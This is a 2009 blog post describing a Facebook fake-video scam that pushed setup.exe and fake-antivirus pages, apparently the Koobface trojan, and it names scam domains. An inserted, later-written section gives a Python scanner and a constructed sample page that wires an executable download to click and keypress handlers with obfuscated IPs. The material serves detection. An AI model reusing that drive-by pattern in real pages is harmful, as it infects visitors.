Facebook and fake video
Friday, October 16th, 2009

First I noticed a friend had added a video to my wall. It didn’t look like his usual stuff - being Scandinavian, he rarely posts in English, and he wouldn’t use slang. So I thought, hmmm…

Of course, I should have noticed that there was no play button on there, but that could have been faked too, so that’s no guarantee!
Next I notice this status update on his profile:
Got a video in my inbox called “Woww! Is thaat reallyy you in that viideo?” Do not click on it. It is a computer virus. And it does not come from me.
I told him immediately that he could track where that “video” had been posted by following the small links on his profile, and he could remove them from other people’s profiles, since “he” had posted them. I suggest others do that as well, if it happens to you!
Then I check the code on the page. There’s a script that’s too convoluted for me to bother figuring out (and my antivirus blocks the page as dangerous anyway), but I did note this:

I do however notice a list of IP addresses in the next table, just slightly obfuscated. One of those gives me (in a text browser) a page that includes the words: Video | Facebook. And there’s also a file: setup.exe, which is loaded on document.onclick and document.onkeydown.
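The pattern described above (an executable wired to document.onclick and document.onkeydown, next to a lightly obfuscated host list) is easy to flag statically. The scanner below is an added example written for this post, not code taken from the page or from any real malicious site. The sample page source is constructed, the hosts in it are documentation-range addresses, and the two obfuscation forms it undoes (\xNN / \uNNNN escapes and "a" + "b" string concatenation) are assumptions, since the post does not say how the IP list was obfuscated.

```python
import re
from dataclasses import dataclass, field

# Constructed sample page source, modelled on the post's description of a
# fake "Video | Facebook" page. Nothing here is copied from a real page.
SAMPLE_HTML = r"""
<html><head><title>Video | Facebook</title>
<script>
var hosts = ["\x31\x39\x32\x2e\x30\x2e\x32\x2e" + "10", "198.51" + ".100.7"];
function go(){ window.location = "http://" + hosts[0] + "/setup.exe"; }
document.onclick = go;
document.onkeydown = go;
</script></head>
<body><div>Click to play</div></body></html>
"""

HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
UNI_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
CONCAT = re.compile(r'"\s*\+\s*"')          # "abc" + "def"  ->  "abcdef"
IPV4 = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
HANDLER = re.compile(r"document\.on(click|keydown|keypress|mousedown)\s*=\s*(\w+)")
EXE_REF = re.compile(r"[\w./:-]*\.exe\b", re.I)


def deobfuscate(js):
    """Undo the two light obfuscations assumed here: JS hex/unicode
    escapes inside string literals, and adjacent string concatenation."""
    js = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), js)
    js = UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), js)
    return CONCAT.sub("", js)


@dataclass
class Finding:
    handlers: list = field(default_factory=list)   # user-input handlers assigned
    exe_refs: list = field(default_factory=list)   # .exe paths/URLs referenced
    ips: list = field(default_factory=list)        # dotted-quad addresses found
    suspicious: bool = False


def scan_page(html):
    """Flag a page whose inline script both hooks a user-input event on
    document and references an executable download."""
    f = Finding()
    for body in SCRIPT.findall(html):
        js = deobfuscate(body)
        f.handlers += [f"document.on{ev}={fn}" for ev, fn in HANDLER.findall(js)]
        f.exe_refs += EXE_REF.findall(js)
        f.ips += IPV4.findall(js)
    f.exe_refs = sorted(set(f.exe_refs))
    f.ips = sorted(set(f.ips))
    # Executable fetch triggered by click/keydown is the combination the post describes.
    f.suspicious = bool(f.handlers) and bool(f.exe_refs)
    return f


if __name__ == "__main__":
    result = scan_page(SAMPLE_HTML)
    print("suspicious:", result.suspicious)
    print("handlers:", result.handlers)
    print("exe refs:", result.exe_refs)
    print("hosts:", result.ips)
```

The recovered addresses are the useful output for a defender: they are what you would block at the proxy or submit to a reputation service, and the handler-plus-executable combination is a reasonable heuristic for triage even when the rest of the script is too convoluted to read.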
I also notice an address that seems to be loaded when you leave the page, going to an affiliate id 02979 at mexcleaner.in. That page includes this sentence:
Your computer is stongly infected by viruses! ‘ It can cause data loss and file damages and need to be cured as soon as possible
It then gives a bogus list of infections, along with a solution:
Affiliate ID 02979 at downloadmasters.org
A Siteadvisor report from two days ago flags that site as redirecting to a Trojan.
———-
Update: Messages similar to those used with these fake videos have been known on Twitter for a while, and back then it was the Koobface trojan being pushed. Here’s what Kee Heritage has to say about this.
A friend who got stung by this said she never clicked on any fake video, so she doesn’t understand how she got it. She has Panda antivirus on her computer, and the scan came up empty. TrendMicro however tends to block most of the pages used in this attack.
Update October 30:
From what I’ve seen of the fake videos, this TrendMicro writeup about Koobface looks very familiar - the addresses last used were blogspot addresses.
————
Sorry I’ve been incommunicado for so long. I figured I’d shift this blog over to the stuff I’m blogging about here, and so far this was the first thing that really got me going enough to divert from all the other stuff I’m doing. Sorry.
